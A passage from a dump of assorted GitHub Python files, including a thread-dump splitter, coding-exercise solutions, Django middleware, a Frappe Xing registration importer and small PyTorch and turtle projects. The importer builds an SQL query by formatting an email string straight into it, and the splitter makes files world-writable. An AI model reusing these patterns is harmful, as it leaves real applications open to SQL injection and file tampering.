thread_dump:\n\t\t\tthread_dump_file.close()\n\t\t\tos.chmod(thread_dump_filename, stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IROTH | stat.S_IWOTH)\n\n\t# Split each instance of a thread into its own file\n\n\tdef split_thread(self, foldername, filename):\n\t\t# Create the folder if it does not yet exist.\n\n\t\tif not os.path.exists(foldername):\n\t\t\tos.mkdir(foldername)\n\n\t\theader_line = None\n\t\tlines = open(filename, 'r')\n\t\tthread_dump = False\n\t\tcounter = 0\n\n\t\tfiles = dict()\n\n\t\tfor line in lines:\n\t\t\tline = line.rstrip()\n\n\t\t\tif len(line) == 0:\n\t\t\t\tif thread_dump:\n\t\t\t\t\tthread_dump_file.close()\n\t\t\t\t\tthread_dump = False\n\t\t\telif timestamp_pattern.match(line):\n\t\t\t\theader_line = line\n\t\t\telif line[0] == '\"':\n\t\t\t\tif thread_dump:\n\t\t\t\t\tthread_dump_file.close()\n\n\t\t\t\tthread_name = line[1:line.rfind('\"')]\n\n\t\t\t\tif thread_name in files:\n\t\t\t\t\tthread_dump_filename = files[thread_name]\n\t\t\t\t\tthread_dump_file = open(thread_dump_filename, 'a')\n\n\t\t\t\t\tthread_dump_file.write('\\n\\n')\n\t\t\t\t\tthread_dump_file.write(header_line)\n\t\t\t\t\tthread_dump_file.write('\\n')\n\t\t\t\telse:\n\t\t\t\t\tcounter += 1\n\n\t\t\t\t\t# thread_dump_filename = os.path.join(\n\t\t\t\t\t# \tfoldername, 'thread_%05d' % counter)\n\n\t\t\t\t\tthread_dump_filename = os.path.join(\n\t\t\t\t\t\tfoldername, 'thread_%s' % thread_name.replace('/', '_'))\n\n\t\t\t\t\tfiles[thread_name] = thread_dump_filename\n\t\t\t\t\tthread_dump_file = open(thread_dump_filename, 'w')\n\t\t\t\t\tthread_dump_file.write(header_line)\n\t\t\t\t\tthread_dump_file.write('\\n')\n\n\t\t\t\tthread_dump = True\n\n\t\t\tif thread_dump:\n\t\t\t\tthread_dump_file.write(line)\n\t\t\t\tthread_dump_file.write('\\n')\n\n\t\tif thread_dump:\n\t\t\tthread_dump_file.close()\n\t\t\tos.chmod(thread_dump_filename, stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IROTH | stat.S_IWOTH)\n\nif __name__ == '__main__':\n\tif len(sys.argv) != 3:\n\t\tprint('syntax: python log_splitter.py \"/path/to/target/folder\" \"/path/to/source/file\"')\n\telse:\n\t\tsplitter = LogSplitter()\n\t\tsplitter.split(sys.argv[1], sys.argv[2])","repo_name":"holatuwol/liferay-faster-deploy","sub_path":"threads/log_splitter.py","file_name":"log_splitter.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"63"} +{"seq_id":"41951528045","text":"# pylint: disable=invalid-sequence-index\n\n\"\"\"Pairwise different summands\n\nGiven an integer 1 <= n <= 109 find the maximal number k such that n can be\nrepresented as a sum of pairwise different positive integers. In the first\nline output k, in the next line output k summands.\n\"\"\"\n\nfrom typing import List\n\n\ndef solve(num: int) -> List[int]:\n i = 1\n summands = []\n while num != 0:\n if num <= 2*i:\n summands.append(num)\n num = 0\n else:\n summands.append(i)\n num -= i\n i += 1\n return summands\n\n\ndef main():\n num = int(input().rstrip())\n result = solve(num)\n\n print(len(result))\n for item in result:\n print(item, end=' ')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lancelote/stepic_python_in_action_eng","sub_path":"solutions/s095.py","file_name":"s095.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"7478163913","text":"import argparse\nfrom functools import partial\nfrom typing import NoReturn, TYPE_CHECKING\nif TYPE_CHECKING:\n from argparse import Namespace\n\nCONF_FORMAT = 'conf/{type}.conf'\nTMPL_FORMAT = 'template/{type}.tmpl'\n\n\nclass CmdType:\n\n FlaskEnv = 'flaskenv'\n Git = 'git'\n\n Vars = {\n FlaskEnv: {'app', 'port'},\n Git: {'email', 'name'},\n }\n\n\ndef handle(args: 'Namespace', type_: str) -> NoReturn:\n conf_path = CONF_FORMAT.format(type=type_)\n tmpl_path = TMPL_FORMAT.format(type=type_)\n vars_ = CmdType.Vars[type_]\n\n with open(tmpl_path) as f:\n tmpl = f.read()\n with open(conf_path, 'w') as f:\n conf = tmpl.format(**{var: getattr(args, var) for var in vars_})\n f.write(conf)\n\n\nparser = argparse.ArgumentParser(description='Desc: generate some config files.')\nsub_parser = parser.add_subparsers()\n\n# git parser\ngit = sub_parser.add_parser('git')\ngit.add_argument('-n', '--name', dest='name', metavar='name',\n help='your git username', required=True)\ngit.add_argument('-e', '--email', dest='email', metavar='email',\n help='your git email', required=True)\ngit.set_defaults(func=partial(handle, type_=CmdType.Git))\n\n# flaskenv parser\nflaskenv = sub_parser.add_parser('flaskenv')\nflaskenv.add_argument('-a', '--app', dest='app', metavar='app',\n help='your flask app path', required=False, default='app')\nflaskenv.add_argument('-p', '--port', dest='port', metavar='port',\n help='your flask run port', required=False, default=8888)\nflaskenv.set_defaults(func=partial(handle, type_=CmdType.FlaskEnv))\n\n# run parser\nargs = parser.parse_args()\nargs.func(args)\n","repo_name":"dyq666/chopper","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"41658573668","text":"n=int(input())\na=0\nif n<0:\n n=-(n)\n a=1\nelse:\n n=n\nsum,mul=0,1\nwhile(n>0):\n rem=n%10\n sum=(sum*10)+rem\n n//=10\nif a==1:\n print(-(sum))\nelse:\n print(sum)\n \n","repo_name":"21P31A1243/codemind-python","sub_path":"Reverse_Integer.py","file_name":"Reverse_Integer.py","file_ext":"py","file_size_in_byte":182,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40289140321","text":"'''\nhttps://programmers.co.kr/learn/courses/30/lessons/17682\n다트 게임\n0. 숫자, 보너스, 옵션에 대한 점수 계산\n1. 정규식 사용\n'''\nimport re\n\ndef solution(dartResult):\n record = re.findall('[0-9]{1,2}[SDT][*#]|[0-9]{1,2}[SDT]', dartResult)\n scores = []\n for i in record:\n a = int(''.join(re.findall('[0-9]', i)))\n b = ''.join(re.findall('[SDT]', i))\n c = ''.join(re.findall('[*#]', i))\n\n if b == 'S':\n score = a\n elif b == 'D':\n score = a ** 2\n else:\n score = a ** 3\n\n if c == \"*\":\n score *= 2\n if scores:\n scores[-1] *= 2\n elif c == \"#\":\n score = -score\n scores.append(score)\n\n return sum(scores)\n'''\nif문으로 해당 index의 값을 비교하기 보다는, 미리 딕셔너리화 해서 key값으로 바로 참조하기\n정규식을 좀 더 깔끔하게 쓸 것\ndef solution(dartResult):\n bonus = {'S' : 1, 'D' : 2, 'T' : 3}\n option = {'' : 1, '*' : 2, '#' : -1}\n p = re.compile('(\\d+)([SDT])([*#]?)')\n dart = p.findall(dartResult)\n for i in range(len(dart)):\n if dart[i][2] == '*' and i > 0:\n dart[i-1] *= 2\n dart[i] = int(dart[i][0]) ** bonus[dart[i][1]] * option[dart[i][2]]\n\n answer = sum(dart)\n return answer\n'''","repo_name":"DKU-STUDY/Algorithm","sub_path":"programmers/난이도별/level01.다트_게임/sangmandu.py","file_name":"sangmandu.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"ko","doc_type":"code","stars":147,"dataset":"github-code","pt":"63"} +{"seq_id":"32300383777","text":"# 백준 29220번 Свидание\nimport sys\nput = sys.stdin.readline\n\nk = int(put())\nn = int(put())\na = sorted(list(map(int, put().split())))\n\nif sum(a[1:]) >= k:\n print(\"YES\")\nelse:\n print(\"NO\")\n","repo_name":"KiwiDot/BOJ-Solution","sub_path":"29000 ~ 29999/29220번: Свидание/boj29220.py","file_name":"boj29220.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"36687093284","text":"from django.db.models.query import Q\n\nfrom core.processors.base import QuerySetProcessor\nfrom datagrowth.datatypes import DocumentPostgres\n\n\nclass FilterProcessor(QuerySetProcessor):\n\n def get_query_filter_for_postgres(self, criteria):\n query_filter = Q()\n for key, values in criteria.items():\n for value in values:\n query_filter |= Q(**{\"properties__{}\".format(key): value})\n return query_filter\n\n def get_query_filter_for_non_postgres(self, criteria):\n query_filter = Q()\n for key, values in criteria.items():\n for value in values:\n query_filter |= Q(properties__contains='{}\": \"{}'.format(key, value))\n return query_filter\n\n def filter(self, query_set):\n criteria = {\n key: self.config.get(key).split(\"|\") for key in self.config.select_keys\n if self.config.get(key, None)\n }\n query_filter = self.get_query_filter_for_postgres(criteria) if issubclass(query_set.model, DocumentPostgres) \\\n else self.get_query_filter_for_non_postgres(criteria)\n return query_set.filter(query_filter)\n","repo_name":"fako/datascope","sub_path":"src/core/processors/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"63"} +{"seq_id":"43057368289","text":"# -*- coding: utf-8 -*-\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist\n\nfrom security_headers.models import FramingAllowedFrom\n\n\ndef extra_security_headers_middleware(get_response):\n \"\"\"\n Sets security headers specified in SETTINGS on all responses.\n \"\"\"\n\n def middleware(req):\n resp = get_response(req)\n\n domain = req.get_host()\n\n try:\n allowed_domains = settings.FRAMING_ALLOWED_FROM\n if not isinstance(allowed_domains, list):\n raise ImproperlyConfigured(\n \"\"\"\n If specified in settings.py, FRAMING_ALLOWED_FROM must be a\n list of allowed domains.\n\n As a security measure, any list specified in settings.py\n overrides any database entries to provide sys admins with a\n veto over user settings.\n \"\"\"\n )\n\n if \"*\" in allowed_domains or domain in allowed_domains:\n resp[\"X-Frame-Options\"] = \"allow-from {}\".format(domain)\n else:\n resp[\"X-Frame-Options\"] = \"deny\"\n\n except AttributeError:\n try:\n allowed_domain = FramingAllowedFrom.objects.get(domain=req.get_host())\n resp[\"X-Frame-Options\"] = \"allow-from {}\".format(allowed_domain)\n except ObjectDoesNotExist:\n resp[\"X-Frame-Options\"] = \"deny\"\n\n if hasattr(settings, \"REFERRER_POLICY\"):\n resp[\"Referrer-Policy\"] = settings.REFERRER_POLICY\n else:\n resp[\"Referrer-Policy\"] = \"same-origin\"\n\n if hasattr(settings, \"FEATURE_POLICY\"):\n resp[\"Feature-Policy\"] = \"; \".join(settings.FEATURE_POLICY)\n else:\n resp[\"Feature-Policy\"] = \"; \".join(\n [\n \"autoplay 'none'\",\n \"camera 'none'\",\n \"display-capture 'none'\",\n \"document-domain 'none'\",\n \"encrypted-media 'none'\",\n \"fullscreen *\",\n \"geolocation 'none'\",\n \"microphone 'none'\",\n \"midi 'none'\",\n \"payment 'none'\",\n \"vr *\",\n ]\n )\n\n return resp\n\n return middleware\n","repo_name":"rogue707Dev/Django-security-headers","sub_path":"security_headers/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"6290679712","text":"from __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\nfrom frappe import _\nfrom frappe.utils.data import getdate\nimport csv\nimport re\nimport datetime\nfrom lifefair.lifefair.utils import add_log\nfrom random import randint\nfrom datetime import timedelta\nfrom datetime import date\nfrom datetime import datetime\n\nclass Registration(Document):\n def create_ticket(self, ignore_permissions=False):\n if not ignore_permissions:\n self.date = date.today()\n \n # get random 18 digit barcode\n self.barcode = get_barcode(18)\n \n # get ticket number (####-####-####)\n self.ticket_number = get_ticket_code()\n \n self.type = \"LF-Ticket\"\n self.email_clerk = frappe.session.user or frappe.get_doc(\"Ticketing Settings\", \"Ticketing Settings\", \"email_clerk\")\n \n meeting = frappe.get_doc('Meeting', self.meeting)\n registration_date = self.date\n meeting_date = meeting.date_date_format #datetime.datetime.strptime(meeting.date_date_format, '%d-%m-%Y')\n \n reg = getdate(registration_date) + timedelta(days=10)\n met = meeting_date - timedelta(days=8)\n \n \n earliest = min(reg, met)\n self.meldedatum = earliest\n \n deadline = date.today() + timedelta(days=7)\n self.deadline_daten_an_partner = deadline\n \n self.save(ignore_permissions=ignore_permissions)\n \n \n return\n pass\n\n\ndef get_barcode(l):\n # generate random barcode\n barcode = ''\n for i in range(l):\n barcode += str(randint(0,9))\n # check if this is already in the database\n db = frappe.get_all(\"Registration\", filters={'barcode': barcode}, fields=['name'])\n if len(db) > 0:\n # it's in the database, retry\n barcode = get_barcode(l)\n return barcode\n\ndef get_ticket_code():\n # generate random ticket code\n ticket_code = ''\n for i in range(14):\n ticket_code += str(randint(0,9))\n ticket_code = list(ticket_code)\n ticket_code[4] = \"/\"\n ticket_code[9] = \"/\"\n ticket_code = \"\".join(ticket_code)\n # check if this is already in the database\n db = frappe.get_all(\"Registration\", filters={'ticket_number': ticket_code}, fields=['name'])\n if len(db) > 0:\n # it's in the database, retry\n ticket_code = get_ticket_code()\n return ticket_code\n \n@frappe.whitelist()\ndef import_xing(content, meeting):\n new_regs = []\n new_pers = []\n \n # field definition\n TICKETNO = 0 # ticket number cell A\n BARCODE = 1 # barcode cell B\n REMARKS = 2 # remarks field (\"Kategorie\")\n STATUS = 4 # status ['Bezahlt', 'Storniert', 'Versendet']\n DATE = 5 # order date (13.07.2018, 16:56)\n SALUTATION = 10\n TITLE = 11\n FIRST_NAME = 12\n LAST_NAME = 13\n EMAIL = 14\n COMPANY = 15\n PHONE = 50 # AY\n STREET = 26 # AA \n PINCODE = 28 # AC\n CITY = 29 # AD\n FUNCTION = 49 # AX \n BLOCK = 52 # BA, contains IF.xx\n TYPE = 3\n PAYMENT = 44 # AS\n INVOICENO = 43 # AR\n CODE = 47 # AV, \"Gutscheincode\", e.g. \"S18STAFF\"\n PARTICIPATION = 51 # AZ, \"Ich nehme teil\" \n PHONE_2 = None\n \n isfirst = True\n # read csv\n elements = csv.reader(content.splitlines(), dialect=csv.excel)\n counter = 0\n # process elements\n for element in elements:\n if isfirst:\n isfirst = False;\n # find colums codes\n i = 0\n for column in element:\n if column == \"Ticketnummer\":\n TICKETNO = i\n elif column == \"Barcode\":\n BARCODE = i\n elif column == \"Kategorie\": \n REMARKS = i\n elif column == \"Status\": \n STATUS = i\n elif column == \"Bestelldatum\":\n DATE = i\n elif column == \"Anrede\":\n SALUTATION = i\n elif column == \"Titel\":\n TITLE = i\n elif column == \"Vorname\":\n FIRST_NAME = i\n elif column == \"Nachname\":\n LAST_NAME = i\n elif column == \"Ticket-Email\":\n EMAIL = i\n elif column == \"Firma\":\n COMPANY = i\n elif column == \"Telefon\":\n PHONE = i\n elif column == \"Telefonnummer\":\n PHONE_2 = i\n elif column == \"Strasse\":\n STREET = i\n elif column == \"Postleitzahl\": \n PINCODE = i\n elif column == \"Ort\":\n CITY = i\n elif column == \"Funktion\":\n FUNCTION = i\n elif \"Innovationsforen\" in column:\n BLOCK = i\n elif column == \"Ticketart\":\n TYPE = i\n elif column == \"Bezahlart\":\n PAYMENT = i\n elif column == \"Rechnungsnummer\":\n INVOICENO = i\n elif column == \"Gutscheincode\":\n CODE = i\n elif \"Ich nehme teil\" in column:\n PARTICIPATION = i\n i += 1\n continue\n counter += 1\n # check if the ticket is already in the database\n db_regs = frappe.get_all(\"Registration\", filters={'ticket_number': element[TICKETNO]}, fields=['name'])\n if db_regs:\n # ticket is already in the database, update\n reg = frappe.get_doc(\"Registration\", db_regs[0]['name'])\n status = parse_status(element[STATUS], element[REMARKS])\n reg.status = status\n reg.type = element[TYPE]\n reg.payment = element[PAYMENT]\n reg.invoice_number = element[INVOICENO]\n reg.phone = element[PHONE]\n reg.code = element[CODE]\n reg.participation = element[PARTICIPATION]\n # find block\n block = find_block(element[BLOCK], meeting)\n reg.block = block\n try:\n reg.save()\n frappe.db.commit()\n except Exception as e:\n frappe.log_error(\"Import Xing Error\", \"Update Registration failed. {0}\".format(e)) \n else:\n # ticket is not in the database, create\n # check email address to find person\n db_person = frappe.get_all(\"Person\", filters={'email': element[EMAIL]}, fields=['name'])\n # iterate over email2 and email3 in case of no hit\n if not db_person:\n db_person = frappe.get_all(\"Person\", filters={'email2': element[EMAIL]}, fields=['name'])\n if not db_person:\n db_person = frappe.get_all(\"Person\", filters={'email3': element[EMAIL]}, fields=['name'])\n phone = element[PHONE]\n if PHONE_2 and element[PHONE_2] and element[PHONE_2] != \".\":\n phone = element[PHONE_2]\n if db_person:\n person_name = db_person[0]['name']\n # get person, check website_description and update if empty\n person = frappe.get_doc(\"Person\", db_person[0]['name'])\n if not person.website_description:\n person.website_description = \"{0}, {1}\".format(element[FUNCTION], element[COMPANY])\n # update phone number if missing\n if not person.company_phone:\n person.company_phone = phone\n person.save()\n else:\n # person not found, create new person\n new_person = create_person(company=element[COMPANY],first_name=element[FIRST_NAME], \n last_name=element[LAST_NAME], title=element[TITLE],\n salutation=element[SALUTATION], email=element[EMAIL], phone=phone, \n function=element[FUNCTION], street=element[STREET], pincode=element[PINCODE], \n city=element[CITY], source=\"from xing\")\n if new_person:\n new_pers.append(new_person)\n person_name = new_person\n else:\n frappe.log_error(\"Import Xing Error\", \"Failed to insert person {0} {1} (Ticket: {2})\".format(element[FIRST_NAME], element[LAST_NAME], element[TICKETNO]))\n \n # create the new registration\n # find block\n block = find_block(element[BLOCK], meeting)\n # parse date stamp (13.07.2018, 16:56)\n date_fields = element[DATE].split(',')[0].split('.')\n if len(date_fields) >= 3:\n # proper date stamp\n date = \"{0}-{1}-{2}\".format(date_fields[2], date_fields[1], date_fields[0])\n else:\n # found float timestamp\n zerodate = datetime.datetime(1899, 12, 30)\n delta = datetime.timedelta(days=float(element[DATE]))\n converted_date = zerodate + delta\n date = \"{year:04d}-{month:02d}-{day:02d}\".format(year=converted_date.year, month=converted_date.month, day=converted_date.day)\n # parse status ['Bezahlt', 'Storniert', 'Versendet'] > [Tentative, Confirmed, Cancelled, Paid, Sent]\n status = parse_status(element[STATUS], element[REMARKS])\n try:\n registration = frappe.get_doc({\n 'doctype': \"Registration\",\n 'person': person_name,\n 'meeting': meeting,\n 'block': block,\n 'date': date,\n 'remarks': element[REMARKS],\n 'ticket_number': element[TICKETNO],\n 'barcode': element[BARCODE],\n 'type': element[TYPE],\n 'payment': element[PAYMENT],\n 'invoice_number': element[INVOICENO],\n 'phone': phone,\n 'status': status,\n 'code': element[CODE],\n 'participation': element[PARTICIPATION]\n })\n registration = registration.insert()\n reg_name = registration.name\n frappe.db.commit()\n new_regs.append(reg_name)\n except Exception as e:\n frappe.log_error(\"Import Xing Error\", \"Insert Registration failed. {0} (Ticket: {1})\".format(e, element[TICKETNO]))\n add_log(title= _(\"Xing Import complete\"),\n message = ( _(\"Import of {0} registrations ({1}) and {2} contacts ({3}).\")).format(\n len(new_regs), new_regs, len(new_pers), new_pers),\n topic = \"Xing\") \n return { 'registrations': new_regs, 'people': new_pers }\n\ndef create_person(first_name, last_name, email, title=None, salutation=None, company=None, function=None, phone=None,\n street=None, pincode=None, city=None, source=\"from xing\"):\n # check if the person is already in the database (by email)\n sql_query = \"\"\"SELECT `name` \n FROM `tabPerson`\n WHERE `email` = '{email}'\n OR `email2` = '{email}'\n OR `email3` = '{email}';\"\"\".format(email=email)\n db_person = frappe.db.sql(sql_query, as_dict=True)\n person_name = None\n if not db_person:\n # check if company exists\n company_matches = None\n if company:\n company_matches = frappe.get_all(\"Organisation\", filters={'official_name': company}, fields=['name'])\n # do not insert companies, too many typo issues\n \"\"\"if not company_matches and company and company != \"\":\n company = frappe.get_doc({\n 'doctype': \"Organisation\",\n 'official_name': company\n })\n try:\n company.insert()\n except Exception as e:\n frappe.log_error(\"Insert company {0} failed {1}\".format(company, e)) \"\"\"\n full_name = \"{0} {1}\".format(first_name, last_name)\n if title:\n long_name = \"{0} {1} {2}\".format(title, first_name, last_name)\n else:\n long_name = full_name\n try:\n first_characters = last_name[0:4].upper()\n except:\n try:\n first_characters = last_name.upper()\n except:\n first_characters = \"NN\"\n gender = salutation\n if gender == \"Herr\":\n letter_salutation = \"Sehr geehrter Herr\"\n elif gender == \"Frau\":\n letter_salutation = \"Sehr geehrte Frau\"\n else:\n gender = \"\"\n letter_salutation = \"\"\n person = frappe.get_doc({\n 'doctype': \"Person\",\n 'first_name': first_name,\n 'last_name': last_name,\n 'full_name': full_name,\n 'long_name': long_name,\n 'first_characters': first_characters,\n 'email': email,\n 'company_phone': phone,\n 'title': title,\n 'gender': gender,\n 'letter_salutation': letter_salutation,\n 'website_description': \"{0}, {1}\".format(function, company),\n 'remarks': \"{5}, {1} @ {0}, {2}, {3} {4}\".format(company, function, \n street, pincode, city, source)\n })\n try:\n person = person.insert()\n # only insert company reference if provided (and matched)\n if company_matches and company and company != \"\":\n if function and function != \"\":\n organisation = person.append('organisations', {})\n organisation.organisation = company\n organisation.function = function\n organisation.is_primary = 0\n organisation.notes = source\n person.primary_organisation = company\n person.primary_function = function\n person.save()\n person_name = person.name\n frappe.db.commit() \n except Exception as e:\n frappe.log_error(\"Import Xing Error\", \"Insert Person {1} {2} failed. {3}: {0}\".format(e, first_name, last_name, source)) \n #frappe.log_error(person_name)\n return person_name\n\ndef find_block(block_field, meeting):\n # regex block finder\n p = re.compile('IF.\\d\\d')\n # find block in the source text\n match_block = p.match(block_field)\n if match_block:\n block = \"{0} {1}\".format(meeting, match_block.group(0))\n # check if the block exists in the db\n db_block = frappe.get_all(\"Block\", \n filters=[['name', 'LIKE', '%{0}%'.format(block)],\n ['meeting', '=', meeting]], \n fields=['name'],\n order_by='name ASC')\n if len(db_block) > 0:\n block = db_block[0]['name']\n else:\n block = None\n else:\n block = None \n return block\n \ndef parse_status(xing_status, remarks=None):\n status = None\n # parse from normal status\n if xing_status == \"Bezahlt\":\n status = \"Paid\"\n elif xing_status == \"Storniert\":\n status = \"Cancelled\"\n elif xing_status == \"Versendet\":\n status = \"Sent\"\n # override status in special cases: Warteliste in remarks is tentative (except on cancellations)\n if not (status == \"Cancelled\") and \"warteliste\" in remarks.replace(\" \", \"\").lower():\n status = \"Tentative\"\n return status\n","repo_name":"libracore/lifefair","sub_path":"lifefair/lifefair/doctype/registration/registration.py","file_name":"registration.py","file_ext":"py","file_size_in_byte":16046,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"63"} +{"seq_id":"24995398184","text":"import os\nimport os.path as path\nimport yaml\nimport jinja2\n\nfrom composer import composer\nfrom helpers.utils import apath, issubdir, mergedicts, snake_case\n\n\nclass ConfigHandler:\n def __init__(self):\n self.configs = {}\n self.configs = self.load_config(apath('~/.hoprc'))\n\n def load_config(self, yaml_file):\n with open(yaml_file) as f:\n config_map = yaml.safe_load(f)\n\n env = jinja2.Environment(loader=jinja2.FileSystemLoader(searchpath='/'))\n template = env.get_template(yaml_file)\n\n config = yaml.safe_load(template.render(**config_map))\n return config\n\n def current_project(self):\n current_project = None\n project_paths = {k: apath(v['path']).rstrip('/') for k, v in self.configs.get('projects', {}).items()}\n current_path = os.getcwd()\n for project, project_path in project_paths.items():\n if issubdir(current_path, project_path):\n current_project = project\n\n return current_project\n\n def current_env(self):\n project = self.current_project()\n if project:\n formatted_project_name = snake_case(project).upper()\n env_var = f'HOP_ENV_{formatted_project_name}'\n return os.getenv(env_var, None)\n\n return None\n\n def project_configs(self, project_name=current_project):\n project_global_config = (\n self.configs\n .get('projects', {})\n .get(project_name))\n\n if project_global_config:\n project_root = project_global_config.get('path')\n if project_root:\n config_path = apath(f'{project_root}/.hop')\n if path.exists(config_path):\n project_specific_config = self.load_config(config_path)\n combined = mergedicts(project_global_config, project_specific_config)\n return combined\n else:\n return project_global_config\n else:\n composer.add('error', f'path is not configured for project {project_name}')\n else:\n composer.add('error', f'Project is not configured')\n\n\nconfigs = ConfigHandler()\n","repo_name":"task-hopper/task-hopper","sub_path":"hop/config_handler.py","file_name":"config_handler.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"24654943715","text":"# Super easy solar system based on the unit circle\n# with coordinates (cosx, siny)\n# Jean Joubert 7 April 2020\n# Moving the sun gives an idea of vortex movements of the planets and moons\n\nimport turtle\nimport math, time\n\nwin = turtle.Screen()\nwin.setup(1100,1100)\nwin.bgcolor('black')\nwin.tracer(0)\n\nsun = turtle.Turtle()\nsun.shape('circle')\nsun.shapesize(5,5)\nsun.color('yellow')\n\n\n\nclass Planet(turtle.Turtle):\n def __init__(self,radius, color, size, star):\n super().__init__(shape='circle')\n self.radius = radius\n self.c = color\n self.color(self.c)\n self.size = size\n self.shapesize(size,size)\n #self.up()\n self.angle = 0\n self.star = star\n\n def move(self):\n x = self.radius*math.cos(self.angle) # radians\n y = self.radius*math.sin(self.angle)\n\n self.goto(self.star.xcor()+x,self.star.ycor()+y)\n\n\n\nearth = Planet(160,'blue', 1, sun)\nmercury = Planet(80, 'grey', 0.6, sun)\nvenus = Planet(120, 'orange', 0.8, sun)\nmars = Planet(200, 'red', 0.9, sun)\n\nmoon = Planet(40, 'grey', 0.2, earth) # moon a 'planet' that orbits earth\nphobos = Planet(40, 'grey', 0.2, mars)\ndeimos = Planet(35, 'white', 0.2, mars)\n\nmyList = [sun, earth, mercury, venus, mars, moon, phobos, deimos]\n\nfor i in myList:\n i.up()\n i.goto(-1000,1000)\n i.down()\n\n\n\nwhile True:\n win.update()\n for i in range(1,7):\n myList[i].move()\n\n moon.angle += 0.06\n phobos.angle += 0.06\n deimos.angle += 0.08\n \n mercury.angle += 0.05\n venus.angle += 0.03\n earth.angle += 0.01\n mars.angle += 0.007\n\n sun.goto(sun.xcor()+1, sun.ycor()-1)\n \n time.sleep(0.01)\n \n \n","repo_name":"jeanjoubert10/Solar-system-with-python-3-and-turtle","sub_path":"2 Solar system vortex.py","file_name":"2 Solar system vortex.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"73742518279","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom Data_loader import Data_loader\nfrom config import Config\nfrom dataset_processing import create_dataset_global\nfrom torch_geometric.nn import global_mean_pool as gap, global_max_pool as gmp\nfrom torch_scatter import scatter_max, scatter_mean\n\nclass DeepWalk(nn.Module):\n def __init__(self,args):\n super(DeepWalk, self).__init__()\n path = '/home/yuanyuan/workplace/influence/data/sample2_dataset_unc_norm.npy'\n self.config = Config\n self.dataset = create_dataset_global(path)\n self.num_communities = args.num_communities\n self.args = args\n '''\n Data(x=x, edge_index=edge_index, edge_attr=edge_attr, y=y, community=community,\n pooling_edges=pooling_edges, community_idx_for_pooling=community_idx_for_pooling,\n multi_community_nodes=multi_community_nodes, multi_community_index=multi_community_index,\n adj_inter=adj_inter, adj_intra=adj_intra, edge_attr_inter=edge_attr_inter,\n edge_attr_intra=edge_attr_intra)\n '''\n self.linear_feature = nn.Linear(60,20)\n self.linear_DW = nn.Linear(20,20)\n self.linear = nn.Linear(40,self.config.output_size)\n self.demographic_linear = nn.Linear(8,20)\n self.purchase_linear = nn.Linear(12,20)\n \n def community_pooling(self, x, community, multi_community_nodes, multi_community_index):\n x = torch.cat((x,x[multi_community_nodes,:]), dim=0)\n community = torch.cat((community.view(-1), multi_community_index), dim=0)\n community = community.view(-1,1).repeat(1,x.size()[1])\n res1 = scatter_mean(x, community, dim=0, dim_size=self.num_communities)\n res2, _ = scatter_max(x, community, dim=0, dim_size=self.num_communities)\n return torch.cat([res1,res2], dim=1)\n \n def forward(self,x):\n\n demographic = F.relu(self.demographic_linear(self.dataset.x[:,:8].to(self.args.device)))\n purchase = F.relu(self.purchase_linear(self.dataset.x[:,8:].to(self.args.device)))\n\n y = torch.cat((demographic,purchase,x),1)\n\n y = F.relu(self.linear_feature(y))\n\n y = self.community_pooling(y,self.dataset.community.to(self.args.device),self.dataset.multi_community_nodes.to(self.args.device),self.dataset.multi_community_index.to(self.args.device))\n # batch_size * embedding_size\n\n y = F.relu(self.linear(y))\n\n return y\n\n\n\n\n\n\n\n\n\n\n\n\n \n\n\n \n","repo_name":"YuanYuan98/Community-Value-Prediction-Baseline","sub_path":"src/DeepWalk.py","file_name":"DeepWalk.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"24595112735","text":"#generat next move\r\ndef incMoveSet():\r\n global moveSet, moveNumber, depth\r\n moveNumber, moveSet[0] = moveNumber+1, moveSet[0]+1\r\n for i in range(len(moveSet)):\r\n if moveSet[i] == 6:\r\n moveSet[i] = 0\r\n if i == len(moveSet)-1:\r\n moveSet.append(0)\r\n depth += 1\r\n print('Depth = ',str(depth))\r\n else:\r\n moveSet[i+1] += 1\r\n\r\n#Check for redundancy in move\r\ndef isRedundant():\r\n global moveSet\r\n status = False\r\n if len(moveSet) > 1:\r\n for i in range(len(moveSet)-1):\r\n status = status or moveSet[i] == moveSet[i+1]\r\n return status\r\n else:\r\n return False\r\n#initilization\r\nf, l, r, b, depth, moveSet, moveNumber = [], [], [], [], 0, [0], 0\r\n\r\n#get inputs\r\nfor face in ['f','l','r','b']:\r\n print('Enter ' + face)\r\n for i in range(10):\r\n\t eval(face).append(input())\r\n\r\n#store a copy\r\nfront, left, right, bottom = f[:], l[:], r[:], b[:]\r\n\r\n#try all possible combinations\r\nwhile (all([False for face in [front, left, right, bottom] for i in range(len(eval('face'))) 